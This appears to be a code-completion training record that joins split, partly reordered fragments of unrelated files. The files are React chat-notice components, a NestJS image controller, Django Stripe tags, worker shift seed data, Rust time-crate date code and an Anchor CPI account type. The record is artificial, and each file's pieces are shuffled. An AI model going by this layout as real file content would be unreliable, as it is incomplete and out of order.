<Text type="BodySmallSemibold" style={{textAlign: 'center', marginTop: globalMargins.tiny}}>
Note that:
</Text>
<Box style={{...globalStyles.flexBoxColumn, marginTop: globalMargins.xtiny}}>
<Box style={{...globalStyles.flexBoxRow}}>
<Text type="BodySmallSemibold" style={{marginRight: globalMargins.tiny}}>
{'\u2022'}
</Text>
<Text type="BodySmallSemibold">
Your team channels will now appear in the "Big teams" section of the inbox.
</Text>
</Box>
<Box style={{...globalStyles.flexBoxRow, marginTop: globalMargins.tiny}}>
<Text type="BodySmallSemibold" style={{marginRight: globalMargins.tiny}}>
{'\u2022'}
</Text>
{!isAndroid && (
<Text type="BodySmallSemibold">
Notifications will no longer happen for every message. {isMobile ? 'Tap' : 'Click on'} the{' '}
<Box style={{display: isMobile ? 'flex' : 'inline-block', height: 11, width: 11}}>
<Icon type="iconfont-info" style={{fontSize: 11}} />
</Box>{' '}
to configure them.
</Text>
)}
{isAndroid && (
<Text type="BodySmallSemibold">
Notifications will no longer happen for every message. Tap the info icon in the top right to
configure them.
</Text>
)}
</Box>
<Box style={{...globalStyles.flexBoxRow, marginTop: globalMargins.tiny}}>
<Text type="BodySmallSemibold" style={{marginRight: globalMargins.tiny}}>
{'\u2022'}
</Text>
<Text type="BodySmallSemibold">
Everyone can now create and join channels.{' '}
<Text
onClick={() => onManageChannels(teamname || '')}
type="BodySmallSemiboldInlineLink"
style={{color: globalColors.blue}}
>
Manage your channel subscriptions
</Text>
</Text>
</Box>
</Box>
</Box>
</UserNotice>
)
}
type InviteAddedToTeamProps = Props & {info: InviteAcceptedInfo}
const InviteAddedToTeamNotice = ({
channelname,
message,
info,
onClickUserAvatar,
onManageChannels,
onViewTeam,
you,
}: InviteAddedToTeamProps) => {
const {team, inviter, invitee, adder, inviteType} = info
let copy
if (you === invitee) {
copy = (
<Text type="BodySmallSemibold" style={{textAlign: 'center'}}>
Welcome to{' '}
<Text type="BodySmallSemibold" style={{color: globalColors.black_60}}>
{team}
</Text>
. Say hi!{' '}
<EmojiIfExists style={{display: isMobile ? 'flex' : 'inline-block'}} emojiName=":wave:" size={14} />
</Text>
)
} else {
copy = (
<Text type="BodySmallSemibold" style={{textAlign: 'center'}}>
<ConnectedUsernames {...connectedUsernamesProps} usernames={[invitee]} /> just joined {team}.{' '}
{you === inviter ? 'You invited them' : 'They were invited by '}
{you !== inviter && <ConnectedUsernames {...connectedUsernamesProps} usernames={[inviter]} />}
{inviteType === 'seitan' ? '' : ' via ' + inviteType}
, and they were just now auto-added to the team sigchain by{' '}
{you === adder ? 'you' : <ConnectedUsernames {...connectedUsernamesProps} usernames={[adder]} />}
, the first available admin.
</Text>
)
}
return (
<UserNotice
style={{marginTop: globalMargins.small}}
username={invitee === you ? undefined : invitee}
teamname={invitee === you ? team : undefined}
bgColor={globalColors.blue4}
onClickAvatar={invitee === you ? () => onViewTeam(team) : () => onClickUserAvatar(invitee)}
>
{you === invitee && (
<Icon type="icon-team-sparkles-48-40" style={{marginTop: -36, width: 48, height: 40}} />
)}
<Text type="BodySmallSemibold" backgroundMode="Announcements" style={{color: globalColors.black_40}}>
{formatTimeForMessages(message.timestamp)}
</Text>
<Box style={{...globalStyles.flexBoxColumn, alignItems: 'center'}}>{copy}</Box>
</UserNotice>
)
}
type GitPushInfoProps = Props & {info: GitPushInfo}
const GitPushInfoNotice = ({message, info, onClickUserAvatar, onViewGitRepo}: GitPushInfoProps) => {
// There is a bug in the data layer where mergeEntities when it sees dupes of this message will keep on adding to the array
// Short term fix: clean this up
const refsMap = (info.refs || []).reduce((map, ref) => {
;(ref.commits || []).forEach(commit => {
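      // refName is a fully-qualified git ref (e.g. "refs/heads/<branch>"); index 2 is the branch name.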
const name = ref.refName.split('/')[2]
if (!map[name]) {
map[name] = []
}
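      // Skip duplicate commits (same hash); this guards against the mergeEntities dupes noted above.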
if (!map[name].find(c => c.commitHash === commit.commitHash)) {
map[name].push(commit)
}
})
return map
}, {})
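  // Render one notice per branch; returning a keyed array of elements is valid in React 16+.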
return Object.keys(refsMap).map(branchName => (
<UserNotice
username={info.pusher}
key={branchName}
style={{marginTop: globalMargins.small}}
bgColor={globalColors.blue4}
onClickAvatar={() => onClickUserAvatar(info.pusher)}
>
<Text type="BodySmallSemibold" backgroundMode="Announcements" style={{color: globalColors.black_40}}>
{formatTimeForMessages(message.timestamp)}
</Text>
<Box style={globalStyles.flexBoxColumn}>
<Text type="BodySmallSemibold" style={{textAlign: 'center', marginBottom: globalMargins.xtiny}}>
<ConnectedUsernames {...connectedUsernamesProps} usernames={[info.pusher]} /> pushed{' '}
{refsMap[branchName].length} {`commit${refsMap[branchName].length !== 1 ? 's' : ''}`} to{' '}
<Text
type="BodySmallSemibold"
style={info.repoID ? {color: globalColors.black_75} : undefined}
onClick={info.repoID ? () => onViewGitRepo(info.repoID, info.team) : undefined}
>{`${info.repo}/${branchName}`}</Text>:
</Text>
<Box style={globalStyles.flexBoxColumn}>
{refsMap[branchName].map((commit, i) => (
<Box style={globalStyles.flexBoxRow} key={commit.commitHash}>
<TimelineMarker
idx={i}
max={refsMap[branchName].length - 1}
style={{marginRight: globalMargins.xtiny, ...(isMobile ? {marginTop: -3} : null)}}
/>
<Box style={{...globalStyles.flexBoxRow, flex: 1, alignItems: 'flex-start'}}>
<Box
style={{
display: 'flex',
backgroundColor: globalColors.blue3_20,
padding: 2,
borderRadius: 3,
marginRight: globalMargins.xtiny,
marginBottom: 1,
height: 18,
}}
>
<Text
type="Terminal"
selectable={true}
style={{
fontSize: 11,
color: globalColors.blue,
lineHeight: isMobile ? 16 : 1.3,
}}
>
{commit.commitHash.substr(0, 8)}
</Text>
</Box>
<Box style={{display: 'flex', flex: 1}}>
<Text type="BodySmall" selectable={true} style={{textAlign: 'left'}} lineClamp={2}>
{commit.message}
</Text>
</Box>
</Box>
</Box>
))}
</Box>
</Box>
</UserNotice>
))
}
export {AddedToTeamNotice, ComplexTeamNotice, InviteAddedToTeamNotice, GitPushInfoNotice}
|
<UserNotice
style={{marginTop: globalMargins.small}}
teamname={teamname || ''}
|
image.controller.ts
|
import { Controller, Get, Post, Body, Patch, Param, Delete } from '@nestjs/common';
import { ImageService } from './image.service';
import { CreateImageDto } from './dto/create-image.dto';
import { UpdateImageDto } from './dto/update-image.dto';
|
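// Read/update/delete endpoints for images; each handler delegates to ImageService.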
@Controller('api/images')
export class ImageController {
constructor(private readonly imageService: ImageService) {}
@Get()
async findAll() {
return await this.imageService.findAll();
}
@Get(':id')
async findOne(@Param('id') id: string) {
return await this.imageService.findOne(id);
}
@Patch(':id')
async update(@Param('id') id: string, @Body() updateImageDto: UpdateImageDto) {
return await this.imageService.update(id, updateImageDto);
}
@Delete(':id')
async remove(@Param('id') id: string) {
return await this.imageService.remove(id);
}
@Delete()
async removeAll() {
return await this.imageService.removeAll();
}
}
| |
payments_tags.py
|
from django import template
from ..forms import PlanForm
register = template.Library()
|
"form": PlanForm(initial={
"plan": context["request"].user.customer.current_subscription.plan
})
})
return context
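# Renders the bare subscribe form, with no plan pre-selected.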
@register.inclusion_tag("drfstripe/_subscribe_form.html", takes_context=True)
def subscribe_form(context):
context.update({
"form": PlanForm()
})
return context
|
@register.inclusion_tag("drfstripe/_change_plan_form.html", takes_context=True)
def change_plan_form(context):
context.update({
|
workers.consts.js
|
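// Worker seed data (field semantics inferred from the values, not documented):
// `constraints` appears to hold blocked day-of-month numbers, `shiftsAMonth` a
// monthly shift quota, and `shabats` a count of Shabbat shifts.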
const bar = {id: 1, firstName: 'Bar', lastName: 'Ashual', gender: 'm', constraints: [1,2,3], shiftsAMonth: 6, preferNot:[], isSenior: 1, shabats: 1};
const omerD = {id: 2, firstName: 'Omer', lastName: 'Dital', gender: 'm', constraints: [4,5,6], shiftsAMonth: 5, preferNot:[], isSenior: 1, shabats: 1};
|
const lior = {id: 5, firstName: 'Lior', lastName: 'tooba', gender: 'f', constraints: [5,7], shiftsAMonth: 1, preferNot:[], isSenior: 1, shabats: 0};
const or = {id: 6, firstName: 'Or', lastName: 'Gibor', gender: 'f', constraints: [6,7], shiftsAMonth: 2, preferNot:[],isSenior: 0, shabats: 0};
const noga = {id: 7, firstName: 'Noga', lastName: 'Lavan', gender: 'f', shiftsAMonth: 5, constraints: [], preferNot:[], isSenior: 0, shabats: 1};
const inbal = {id: 8, firstName: 'Inbal', lastName: 'Avraham', gender: 'f', shiftsAMonth: 4, constraints: [], preferNot:[], isSenior:0 ,shabats: 0};
const ori = {id: 9, firstName: 'Ori', lastName: 'Hoogi', gender: 'm', shiftsAMonth: 2, constraints: [30,21,24], preferNot:[], isSenior: 1, shabats: 0};
const tal = {id: 10, firstName: 'Tal', lastName: 'Mikey', gender: 'm', shiftsAMonth: 3, constraints: [27,28,29,1,2,3,4,5], preferNot:[], isSenior: 1, shabats: 0};
const ido = {id: 11, firstName: 'Ido', lastName: 'Perach', gender: 'm', shiftsAMonth: 1, constraints: [], preferNot:[], isSenior: 0, shabats: 1};
const daniel = {id: 12, firstName: 'Daniel', lastName: 'Moyal', gender: 'f', shiftsAMonth: 0, constraints: [], preferNot:[], isSenior: 0, shabats: 0};
const sharon = {id: 13, firstName: 'Sharon', lastName: 'Grossman', gender: 'm', shiftsAMonth: 1, constraints: [], preferNot:[], isSenior: 1, shabats: 0};
const omerB = {id: 14, firstName: 'Omer', lastName: 'Bahari', gender: 'm', shiftsAMonth: 0, constraints: [], preferNot:[], isSenior: 1, shabats: 0};
export const workers = [bar, omerD, ofek, hen, lior, or, noga, inbal, ori, tal, ido, daniel, sharon, omerB];
|
const ofek = {id: 3, firstName: 'Ofek', lastName: 'Israel', gender: 'm', constraints: [1,3,4], shiftsAMonth: 5, preferNot:[], isSenior: 0, shabats: 0};
const hen = {id: 4, firstName: 'Hen', lastName: 'Sinai', gender: 'm', constraints: [], shiftsAMonth: 2, preferNot:[], isSenior: 1, shabats: 0};
|
primitive_date_time.rs
|
use crate::{
error, format_description::FormatDescription, hack, util, Date, Duration, OffsetDateTime, Time,
UtcOffset, Weekday,
};
#[cfg(feature = "alloc")]
use alloc::string::String;
use const_fn::const_fn;
use core::{
fmt,
ops::{Add, AddAssign, Sub, SubAssign},
time::Duration as StdDuration,
};
/// Combined date and time.
#[cfg_attr(feature = "serde", derive(serde::Serialize, serde::Deserialize))]
#[cfg_attr(
feature = "serde",
serde(
into = "crate::serde::PrimitiveDateTime",
try_from = "crate::serde::PrimitiveDateTime"
)
)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, PartialOrd, Ord)]
pub struct PrimitiveDateTime {
#[allow(clippy::missing_docs_in_private_items)]
pub(crate) date: Date,
#[allow(clippy::missing_docs_in_private_items)]
pub(crate) time: Time,
}
impl PrimitiveDateTime {
/// Create a new `PrimitiveDateTime` from the provided [`Date`] and
/// [`Time`].
///
/// ```rust
/// # use time::PrimitiveDateTime;
/// # use time_macros::{date, datetime, time};
/// assert_eq!(
/// PrimitiveDateTime::new(date!("2019-01-01"), time!("0:00")),
/// datetime!("2019-01-01 0:00"),
/// );
/// ```
pub const fn new(date: Date, time: Time) -> Self {
Self { date, time }
}
/// Get the [`Date`] component of the `PrimitiveDateTime`.
///
/// ```rust
/// # use time_macros::{date, datetime};
/// assert_eq!(datetime!("2019-01-01 0:00").date(), date!("2019-01-01"));
/// ```
pub const fn date(self) -> Date {
self.date
}
/// Get the [`Time`] component of the `PrimitiveDateTime`.
///
/// ```rust
/// # use time_macros::{datetime, time};
/// assert_eq!(datetime!("2019-01-01 0:00").time(), time!("0:00"));
pub const fn time(self) -> Time {
self.time
}
/// Get the year of the date.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").year(), 2019);
|
/// assert_eq!(datetime!("2019-12-31 0:00").year(), 2019);
/// assert_eq!(datetime!("2020-01-01 0:00").year(), 2020);
/// ```
pub const fn year(self) -> i32 {
self.date.year()
}
/// Get the month of the date.
///
/// The returned value will always be in the range `1..=12`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").month(), 1);
/// assert_eq!(datetime!("2019-12-31 0:00").month(), 12);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn month(self) -> u8 {
self.date.month()
}
/// Get the day of the date.
///
/// The returned value will always be in the range `1..=31`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").day(), 1);
/// assert_eq!(datetime!("2019-12-31 0:00").day(), 31);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn day(self) -> u8 {
self.date.day()
}
/// Get the day of the year.
///
/// The returned value will always be in the range `1..=366` (`1..=365` for
/// common years).
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").ordinal(), 1);
/// assert_eq!(datetime!("2019-12-31 0:00").ordinal(), 365);
/// ```
pub const fn ordinal(self) -> u16 {
self.date.ordinal()
}
/// Get the ISO week number.
///
/// The returned value will always be in the range `1..=53`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").iso_week(), 1);
/// assert_eq!(datetime!("2019-10-04 0:00").iso_week(), 40);
/// assert_eq!(datetime!("2020-01-01 0:00").iso_week(), 1);
/// assert_eq!(datetime!("2020-12-31 0:00").iso_week(), 53);
/// assert_eq!(datetime!("2021-01-01 0:00").iso_week(), 53);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn iso_week(self) -> u8 {
self.date.iso_week()
}
/// Get the week number where week 1 begins on the first Sunday.
///
/// The returned value will always be in the range `0..=53`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").sunday_based_week(), 0);
/// assert_eq!(datetime!("2020-01-01 0:00").sunday_based_week(), 0);
/// assert_eq!(datetime!("2020-12-31 0:00").sunday_based_week(), 52);
/// assert_eq!(datetime!("2021-01-01 0:00").sunday_based_week(), 0);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn sunday_based_week(self) -> u8 {
self.date.sunday_based_week()
}
/// Get the week number where week 1 begins on the first Monday.
///
/// The returned value will always be in the range `0..=53`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").monday_based_week(), 0);
/// assert_eq!(datetime!("2020-01-01 0:00").monday_based_week(), 0);
/// assert_eq!(datetime!("2020-12-31 0:00").monday_based_week(), 52);
/// assert_eq!(datetime!("2021-01-01 0:00").monday_based_week(), 0);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn monday_based_week(self) -> u8 {
self.date.monday_based_week()
}
/// Get the year, month, and day.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(
/// datetime!("2019-01-01 0:00").to_calendar_date(),
/// (2019, 1, 1)
/// );
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn to_calendar_date(self) -> (i32, u8, u8) {
self.date.to_calendar_date()
}
/// Get the year and ordinal day number.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").to_ordinal_date(), (2019, 1));
/// ```
pub const fn to_ordinal_date(self) -> (i32, u16) {
self.date.to_ordinal_date()
}
/// Get the ISO 8601 year, week number, and weekday.
///
/// ```rust
/// # use time::Weekday::*;
/// # use time_macros::datetime;
/// assert_eq!(
/// datetime!("2019-01-01 0:00").to_iso_week_date(),
/// (2019, 1, Tuesday)
/// );
/// assert_eq!(
/// datetime!("2019-10-04 0:00").to_iso_week_date(),
/// (2019, 40, Friday)
/// );
/// assert_eq!(
/// datetime!("2020-01-01 0:00").to_iso_week_date(),
/// (2020, 1, Wednesday)
/// );
/// assert_eq!(
/// datetime!("2020-12-31 0:00").to_iso_week_date(),
/// (2020, 53, Thursday)
/// );
/// assert_eq!(
/// datetime!("2021-01-01 0:00").to_iso_week_date(),
/// (2020, 53, Friday)
/// );
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn to_iso_week_date(self) -> (i32, u8, Weekday) {
self.date.to_iso_week_date()
}
/// Get the weekday.
///
/// ```rust
/// # use time::Weekday::*;
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").weekday(), Tuesday);
/// assert_eq!(datetime!("2019-02-01 0:00").weekday(), Friday);
/// assert_eq!(datetime!("2019-03-01 0:00").weekday(), Friday);
/// assert_eq!(datetime!("2019-04-01 0:00").weekday(), Monday);
/// assert_eq!(datetime!("2019-05-01 0:00").weekday(), Wednesday);
/// assert_eq!(datetime!("2019-06-01 0:00").weekday(), Saturday);
/// assert_eq!(datetime!("2019-07-01 0:00").weekday(), Monday);
/// assert_eq!(datetime!("2019-08-01 0:00").weekday(), Thursday);
/// assert_eq!(datetime!("2019-09-01 0:00").weekday(), Sunday);
/// assert_eq!(datetime!("2019-10-01 0:00").weekday(), Tuesday);
/// assert_eq!(datetime!("2019-11-01 0:00").weekday(), Friday);
/// assert_eq!(datetime!("2019-12-01 0:00").weekday(), Sunday);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn weekday(self) -> Weekday {
self.date.weekday()
}
/// Get the Julian day for the date. The time is not taken into account for
/// this calculation.
///
/// The algorithm to perform this conversion is derived from one provided by
/// Peter Baum; it is freely available
/// [here](https://www.researchgate.net/publication/316558298_Date_Algorithms).
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("-4713-11-24 0:00").to_julian_day(), 0);
/// assert_eq!(datetime!("2000-01-01 0:00").to_julian_day(), 2_451_545);
/// assert_eq!(datetime!("2019-01-01 0:00").to_julian_day(), 2_458_485);
/// assert_eq!(datetime!("2019-12-31 0:00").to_julian_day(), 2_458_849);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn to_julian_day(self) -> i32 {
self.date.to_julian_day()
}
/// Get the clock hour, minute, and second.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2020-01-01 0:00:00").as_hms(), (0, 0, 0));
/// assert_eq!(datetime!("2020-01-01 23:59:59").as_hms(), (23, 59, 59));
/// ```
pub const fn as_hms(self) -> (u8, u8, u8) {
self.time.as_hms()
}
/// Get the clock hour, minute, second, and millisecond.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2020-01-01 0:00:00").as_hms_milli(), (0, 0, 0, 0));
/// assert_eq!(
/// datetime!("2020-01-01 23:59:59.999").as_hms_milli(),
/// (23, 59, 59, 999)
/// );
/// ```
pub const fn as_hms_milli(self) -> (u8, u8, u8, u16) {
self.time.as_hms_milli()
}
/// Get the clock hour, minute, second, and microsecond.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2020-01-01 0:00:00").as_hms_micro(), (0, 0, 0, 0));
/// assert_eq!(
/// datetime!("2020-01-01 23:59:59.999_999").as_hms_micro(),
/// (23, 59, 59, 999_999)
/// );
/// ```
pub const fn as_hms_micro(self) -> (u8, u8, u8, u32) {
self.time.as_hms_micro()
}
/// Get the clock hour, minute, second, and nanosecond.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2020-01-01 0:00:00").as_hms_nano(), (0, 0, 0, 0));
/// assert_eq!(
/// datetime!("2020-01-01 23:59:59.999_999_999").as_hms_nano(),
/// (23, 59, 59, 999_999_999)
/// );
/// ```
pub const fn as_hms_nano(self) -> (u8, u8, u8, u32) {
self.time.as_hms_nano()
}
/// Get the clock hour.
///
/// The returned value will always be in the range `0..24`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").hour(), 0);
/// assert_eq!(datetime!("2019-01-01 23:59:59").hour(), 23);
/// ```
pub const fn hour(self) -> u8 {
self.time.hour
}
/// Get the minute within the hour.
///
/// The returned value will always be in the range `0..60`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").minute(), 0);
/// assert_eq!(datetime!("2019-01-01 23:59:59").minute(), 59);
/// ```
pub const fn minute(self) -> u8 {
self.time.minute
}
/// Get the second within the minute.
///
/// The returned value will always be in the range `0..60`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").second(), 0);
/// assert_eq!(datetime!("2019-01-01 23:59:59").second(), 59);
/// ```
pub const fn second(self) -> u8 {
self.time.second
}
/// Get the milliseconds within the second.
///
/// The returned value will always be in the range `0..1_000`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").millisecond(), 0);
/// assert_eq!(datetime!("2019-01-01 23:59:59.999").millisecond(), 999);
/// ```
pub const fn millisecond(self) -> u16 {
self.time.millisecond()
}
/// Get the microseconds within the second.
///
/// The returned value will always be in the range `0..1_000_000`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").microsecond(), 0);
/// assert_eq!(
/// datetime!("2019-01-01 23:59:59.999_999").microsecond(),
/// 999_999
/// );
/// ```
pub const fn microsecond(self) -> u32 {
self.time.microsecond()
}
/// Get the nanoseconds within the second.
///
/// The returned value will always be in the range `0..1_000_000_000`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").nanosecond(), 0);
/// assert_eq!(
/// datetime!("2019-01-01 23:59:59.999_999_999").nanosecond(),
/// 999_999_999,
/// );
/// ```
pub const fn nanosecond(self) -> u32 {
self.time.nanosecond
}
/// Assuming that the existing `PrimitiveDateTime` represents a moment in
/// the provided [`UtcOffset`], return an [`OffsetDateTime`].
///
/// ```rust
/// # use time_macros::{datetime, offset};
/// assert_eq!(
/// datetime!("2019-01-01 0:00")
/// .assume_offset(offset!("UTC"))
/// .unix_timestamp(),
/// 1_546_300_800,
/// );
/// assert_eq!(
/// datetime!("2019-01-01 0:00")
/// .assume_offset(offset!("-1"))
/// .unix_timestamp(),
/// 1_546_304_400,
/// );
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn assume_offset(self, offset: UtcOffset) -> OffsetDateTime {
OffsetDateTime {
utc_datetime: self.offset_to_utc(offset),
offset,
}
}
/// Assuming that the existing `PrimitiveDateTime` represents a moment in
/// UTC, return an [`OffsetDateTime`].
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(
/// datetime!("2019-01-01 0:00").assume_utc().unix_timestamp(),
/// 1_546_300_800,
/// );
/// ```
pub const fn assume_utc(self) -> OffsetDateTime {
OffsetDateTime {
utc_datetime: self,
offset: UtcOffset::UTC,
}
}
}
/// Methods that replace part of the `PrimitiveDateTime`.
impl PrimitiveDateTime {
/// Replace the time, preserving the date.
///
/// ```rust
/// # use time_macros::{datetime, time};
/// assert_eq!(
/// datetime!("2020-01-01 17:00").replace_time(time!("5:00")),
/// datetime!("2020-01-01 5:00")
/// );
/// ```
#[must_use = "This method does not mutate the original `PrimitiveDateTime`."]
pub const fn replace_time(self, time: Time) -> Self {
self.date.with_time(time)
}
/// Replace the date, preserving the time.
///
/// ```rust
/// # use time_macros::{datetime, date};
/// assert_eq!(
/// datetime!("2020-01-01 12:00").replace_date(date!("2020-01-30")),
/// datetime!("2020-01-30 12:00")
/// );
/// ```
#[must_use = "This method does not mutate the original `PrimitiveDateTime`."]
pub const fn replace_date(self, date: Date) -> Self {
date.with_time(self.time)
}
}
/// Helper methods to adjust a [`PrimitiveDateTime`] to a given [`UtcOffset`].
impl PrimitiveDateTime {
/// Assuming that the current [`PrimitiveDateTime`] is a value in the
/// provided [`UtcOffset`], obtain the equivalent value in UTC.
#[const_fn("1.46")]
pub(crate) const fn offset_to_utc(self, offset: UtcOffset) -> Self {
let mut second = self.second() as i8 - offset.seconds;
let mut minute = self.minute() as i8 - offset.minutes;
let mut hour = self.hour() as i8 - offset.hours;
let (mut year, mut ordinal) = self.date.to_ordinal_date();
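        // Subtracting the offset field-by-field can push any field out of
        // range, so carry/borrow upward: seconds into minutes, minutes into
        // hours, hours into the ordinal day.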
if second >= 60 {
second -= 60;
minute += 1;
} else if second < 0 {
second += 60;
minute -= 1;
}
if minute >= 60 {
minute -= 60;
hour += 1;
} else if minute < 0 {
minute += 60;
hour -= 1;
}
if hour >= 24 {
hour -= 24;
ordinal += 1;
} else if hour < 0 {
hour += 24;
ordinal -= 1;
}
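        // A day carried or borrowed above may cross a year boundary as well.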
if ordinal > util::days_in_year(year) {
year += 1;
ordinal = 1;
} else if ordinal == 0 {
year -= 1;
ordinal = util::days_in_year(year);
}
Self {
date: Date::from_ordinal_date_unchecked(year, ordinal),
time: Time {
hour: hour as _,
minute: minute as _,
second: second as _,
nanosecond: self.nanosecond(),
padding: hack::Padding::Optimize,
},
}
}
/// Assuming that the current [`PrimitiveDateTime`] is a value in UTC,
/// obtain the equivalent value in the provided [`UtcOffset`].
#[const_fn("1.46")]
pub(crate) const fn utc_to_offset(self, offset: UtcOffset) -> Self {
self.offset_to_utc(UtcOffset::from_hms_unchecked(
-offset.hours,
-offset.minutes,
-offset.seconds,
))
}
}
impl PrimitiveDateTime {
/// Format the `PrimitiveDateTime` using the provided format description.
/// The formatted value will be output to the provided writer. The format
/// description will typically be parsed by using
/// [`FormatDescription::parse`].
pub fn format_into<'a>(
self,
output: &mut dyn fmt::Write,
description: &FormatDescription<'a>,
) -> Result<(), error::Format> {
description.format_into(output, Some(self.date), Some(self.time), None)
}
/// Format the `PrimitiveDateTime` using the provided format description.
/// The format description will typically be parsed by using
/// [`FormatDescription::parse`].
///
/// ```rust
/// # use time::format_description::FormatDescription;
/// # use time_macros::datetime;
/// let format =
/// FormatDescription::parse("[year]-[month repr:numerical]-[day] [hour]:[minute]:[second]")?;
/// assert_eq!(
/// datetime!("2020-01-02 03:04:05").format(&format)?,
/// "2020-01-02 03:04:05"
/// );
/// # Ok::<_, time::Error>(())
/// ```
#[cfg(feature = "alloc")]
#[cfg_attr(__time_03_docs, doc(cfg(feature = "alloc")))]
pub fn format<'a>(self, description: &FormatDescription<'a>) -> Result<String, error::Format> {
let mut s = String::new();
self.format_into(&mut s, description)?;
Ok(s)
}
}
impl fmt::Display for PrimitiveDateTime {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "{} {}", self.date, self.time)
}
}
impl Add<Duration> for PrimitiveDateTime {
type Output = Self;
fn add(self, duration: Duration) -> Self::Output {
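        // `adjusting_add` wraps the time of day and reports whether the date
        // must shift one extra day beyond the whole-day part of `duration`.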
let (date_adjustment, time) = self.time.adjusting_add(duration);
let date = self.date + duration;
Self {
date: match date_adjustment {
util::DateAdjustment::Previous => date.previous_day(),
util::DateAdjustment::Next => date.next_day(),
util::DateAdjustment::None => date,
},
time,
}
}
}
impl Add<StdDuration> for PrimitiveDateTime {
type Output = Self;
fn add(self, duration: StdDuration) -> Self::Output {
let (is_next_day, time) = self.time.adjusting_add_std(duration);
Self {
date: if is_next_day {
(self.date + duration).next_day()
} else {
self.date + duration
},
time,
}
}
}
impl AddAssign<Duration> for PrimitiveDateTime {
fn add_assign(&mut self, duration: Duration) {
*self = *self + duration;
}
}
impl AddAssign<StdDuration> for PrimitiveDateTime {
fn add_assign(&mut self, duration: StdDuration) {
*self = *self + duration;
}
}
impl Sub<Duration> for PrimitiveDateTime {
type Output = Self;
fn sub(self, duration: Duration) -> Self::Output {
self + -duration
}
}
impl Sub<StdDuration> for PrimitiveDateTime {
type Output = Self;
fn sub(self, duration: StdDuration) -> Self::Output {
let (is_previous_day, time) = self.time.adjusting_sub_std(duration);
Self {
date: if is_previous_day {
(self.date - duration).previous_day()
} else {
self.date - duration
},
time,
}
}
}
impl SubAssign<Duration> for PrimitiveDateTime {
fn sub_assign(&mut self, duration: Duration) {
*self = *self - duration;
}
}
impl SubAssign<StdDuration> for PrimitiveDateTime {
fn sub_assign(&mut self, duration: StdDuration) {
*self = *self - duration;
}
}
impl Sub<PrimitiveDateTime> for PrimitiveDateTime {
type Output = Duration;
fn sub(self, rhs: Self) -> Self::Output {
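        // The whole-day difference and the sub-day difference are independent
        // and simply sum to the total duration.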
(self.date - rhs.date) + (self.time - rhs.time)
}
}
| |
cpi_account.rs
|
use crate::error::ErrorCode;
use crate::*;
use solana_program::account_info::AccountInfo;
use solana_program::entrypoint::ProgramResult;
use solana_program::instruction::AccountMeta;
use solana_program::program_error::ProgramError;
use solana_program::pubkey::Pubkey;
use std::ops::{Deref, DerefMut};
/// Container for any account *not* owned by the current program.
#[derive(Clone)]
#[deprecated(note = "Please use Account instead")]
pub struct CpiAccount<'a, T: AccountDeserialize + Clone> {
info: AccountInfo<'a>,
account: Box<T>,
}
#[allow(deprecated)]
impl<'a, T: AccountDeserialize + Clone> CpiAccount<'a, T> {
fn new(info: AccountInfo<'a>, account: Box<T>) -> CpiAccount<'a, T> {
Self { info, account }
}
/// Deserializes the given `info` into a `CpiAccount`.
pub fn try_from(info: &AccountInfo<'a>) -> Result<CpiAccount<'a, T>, ProgramError> {
let mut data: &[u8] = &info.try_borrow_data()?;
Ok(CpiAccount::new(
info.clone(),
Box::new(T::try_deserialize(&mut data)?),
))
}
pub fn try_from_unchecked(info: &AccountInfo<'a>) -> Result<CpiAccount<'a, T>, ProgramError> {
Self::try_from(info)
}
/// Reloads the account from storage. This is useful, for example, when
/// observing side effects after CPI.
pub fn reload(&mut self) -> ProgramResult {
let mut data: &[u8] = &self.info.try_borrow_data()?;
self.account = Box::new(T::try_deserialize(&mut data)?);
Ok(())
}
}
#[allow(deprecated)]
|
where
T: AccountDeserialize + Clone,
{
#[inline(never)]
